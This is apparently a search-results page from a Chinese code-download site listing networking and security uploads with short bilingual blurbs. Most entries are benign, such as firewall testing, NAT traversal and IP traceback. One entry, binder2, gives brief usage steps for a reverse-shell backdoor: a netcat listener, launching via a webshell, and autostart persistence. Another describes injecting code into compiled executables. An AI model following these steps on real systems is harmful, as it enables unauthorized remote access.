搜索资源列表
NATVOIP
- VOIP透明穿透NAT防火墙的方法介绍!硕士学位论文!-VoIP NAT firewall penetration transparent method introduced! Master's degree thesis!
AsmAdjust
- 第三方执行代码侵入方法,常用于病毒/反病毒技术。即在一个已编译完成的PC可执行代码中嵌入自己的可执行代码,并不干扰原程序。侵入级别在物理代码地址级别,低与Rin3级。有很强的攻击性。-third-party code execution invasive method, commonly used in HIV / anti-virus technology. That is compiled in a complete PC executable code embedded in the ex
binder2
- 简介: 在WEB的渗透测试中,我们经常会遇到主机端口被过滤的情况,虽然成功创建后门,但是连接不上,这时,这个反弹式后门也许能起上点作用. 用法: 1. 在本地机器监听一个端口: netcat -vv -l -p 80 2. 通过webShell或是别的什么运行后门: binder2 80 youIPadd 3. 本地监听端口将截获一个来自远程主机的cmd. 注意: 程序本身会创建一个自启动方法, 如果没有参
WPS_2-0_training_20101020-4.2.7
- 4.2.7添加设备使用PIN模式时,AP的MAC地址过滤启用-4.2.7 Add device using PIN Method when AP has MAC Address filtering enabled
NDIS
- NDIS中间层数据包过滤方法 适合于开发网络过滤防火墙-NDIS intermediate layer packet filtering method is suitable for development of Web-filtering firewall
Firewall_performance_tests
- 防火墙的性能测试,RFC2544,性能测试参考标准,国际方法,测试依据-Firewall performance tests, RFC2544, performance testing reference standards, the international method, test based on
Flow-and-firewall
- In research network traffic and firewall TCP/IP packet capture, the basis of the principle of using object-oriented method, the requirement analysis and design functions. In this system, the development VisualC++ 6.0 environment, the comprehensive ad
IP-tracing
- 拒绝服务攻击(DoS)给政府部门和商业机构造成了严重的经济损失和社会威胁。IP追踪技术能够反向追踪IP数据包到它 们的源头,所以是识别和阻止DoS攻击的重要一步。本文针对DoS攻击,对比分析了各个IP反向追踪方法的基本原理和优缺点。-Denial of Service (DoS) to government departments and commercial organizations resulting in serious economic losses and social thre
kolmogorov
- Kolmogorov is a evolutionary method
